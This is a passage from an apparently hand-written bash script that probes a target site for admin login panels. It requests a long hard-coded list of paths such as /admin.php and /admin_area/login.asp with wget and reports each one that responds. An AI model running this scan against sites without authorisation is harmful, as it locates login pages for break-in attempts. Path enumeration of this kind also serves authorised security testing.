echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm_auth.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm_auth.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin.aspx"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin.htm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin.xhtml"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/account.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/account.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/account.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/account.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/account.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/account.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/account.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin_login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin_login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin_login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin_login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin_login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin_login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin_login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/adminLogin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin-login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/adminLogin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin-login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/adminLogin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin-login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/adminLogin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin-login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/adminLogin.htm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/adminLogin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin-login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/adminLogin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin-login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/adminLogin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/admin-login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/controlpanel.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/controlpanel.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/controlpanel.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/controlpanel.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/controlpanel.htm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/controlpanel.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/controlpanel.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/controlpanel.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/cp.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/cp.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/cp.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/cp.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/cp.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/cp.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/cp.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/cp.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/home.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/home.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/home.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/home.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/login.htm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/home.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/home.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/home.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/index.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/index.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/index.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/index.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/index.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/index.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/login.htm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/admin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/admin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/admin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/admin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/admin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/admin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/admin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/index.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/index.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/index.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/index.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/index.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/index.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_area/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/admin_login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
